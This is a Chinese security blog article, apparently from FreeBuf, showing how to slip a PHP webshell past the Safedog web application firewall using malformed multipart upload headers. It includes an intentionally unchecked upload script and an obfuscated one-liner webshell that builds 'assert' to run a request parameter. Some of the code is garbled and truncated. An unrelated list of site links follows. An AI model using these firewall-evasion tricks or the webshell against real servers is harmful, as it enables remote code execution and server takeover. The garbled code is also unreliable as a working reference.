繞過網站安全狗攔截,上傳Webshell技巧總結 | 附免殺PHP一句話
*本文原創作者:1_2,本文屬FreeBuf原創獎勵計劃,未經許可禁止轉載
這篇文章我介紹一下我所知道的繞過網站安全狗上傳WebShell的方法。
思路是:修改HTTP請求,構成畸形HTTP請求,然後繞過網站安全狗的檢測。
廢話不多說,切入正題。。。。
1、實驗環境:
Windows Server 2003、 Apache/2.4.18、PHP/5.3.29、網站安全狗(Apache版)V3.5.12048
2、用於文件上傳的PHP源碼:
$path = dirname(__FILE__) . "/upload/";
$rand = rand(0,30);
move_uploaded_file($_FILES["file"]["tmp_name"],$path . $rand . $_FILES["file"]["name"]);
echo "File Path:" . $path . $rand . $_FILES["file"]["name"] . "
";
echo "OK";
?>
因為此次實驗的目的是繞過網站安全狗,所以PHP源碼上我沒做任何檢測,把上傳的文件直接放在upload目錄下。
3、先看一下正常的HTTP請求:
很明顯,文件名為」yijuhua.php」被攔截。。。。
4、嘗試%00截斷:
很明顯,失敗了。。。
5、修改HTTP請求,構造畸形HTTP請求
(1)刪除實體裡面的Conten-Type欄位:
繞過網站安全狗的攔截,成功上傳WebShell。。。
(2)刪除Content-Disposition欄位里的空格:
(3)修改Content-Disposition欄位值的大小寫:
6、菜刀連接一句話:
到此,上傳WebShell結束,各位看明白了嗎?
7、免殺PHP一句話:
/*
PHP一句話木馬
assert($string)
*/
$arr = array("a","s","s","e","r","t");
$func = "";
for($i=0;$i
$func .= $func . $arr[$i];
}
$func($_REQUEST["c"]);
?>
8、修復漏洞:
出現這種情況,
我認為
是網站安全狗在開發時沒有考慮到畸形HTTP請求,而Apache卻兼容
畸形HTTP請求,所以能夠上傳成功。*本文原創作者:1_2(QQ:965207103),本文屬FreeBuf原創獎勵計劃,未經許可禁止轉載
※一款能在GitHub代碼庫中探測密鑰的工具:Truffle Hog
※洋蔥服務為什麼沒被成功接盤?
※中國安全行業的下一波春天在哪兒?| FreeBuf對話金湘宇
※會說話的PPT | 思科安全如何防禦加密勒索軟體?
※Apache shiro 1.2.4版本遠程命令執行漏洞詳解
TAG:FreeBuf |
※Hidden Alternative Data Streams的進階利用技巧
※Linux+Apache+Mysql+PHP優化技巧
※Smashy Road Wanted怎麼玩 像素公路狂飆玩法技巧分享
※斑駁城堡怎麼玩 Blocky Castle玩法技巧分享
※蘋果官網上線 iPhone 攝影教程頁面,19個iPhone拍照技巧你會了嗎?
※潮流人士專屬進階玩法,iPhone 7 Plus及iPad Pro拍攝修圖技巧公開
※讓我離開這裡怎麼玩 Get Me Outta Here玩法技巧分享
※iPhone整蠱小技巧:打開任何APP都彈出輸入法!
※身為Apple Watch用戶 這些技巧你掌握沒
※Epic Games VR項目美術總監詳解《Robo Recall》的美術優化技巧
※iphone7 plus使用技巧大全 iphone使用手冊
※Yeah Bunny怎麼玩 Yeah Bunny玩法技巧分享
※攝影師分享 iPhone 7 Plus拍攝技巧容易get
※FiddlerScript高級技巧——自定義Fiddler菜單
※健身圈表情包Santi Aragonsanti,大神的賽前技巧
※fgo國服FateZero預熱卡池抽取技巧 FateZero預熱卡池幾點抽?
※無限細分怎麼玩 Subdivision Infinity玩法技巧分享
※炸彈獵人怎麼玩 Bomb Hunters玩法技巧分享
※你用的也叫iPhone?十個iPhone不為人知的使用技巧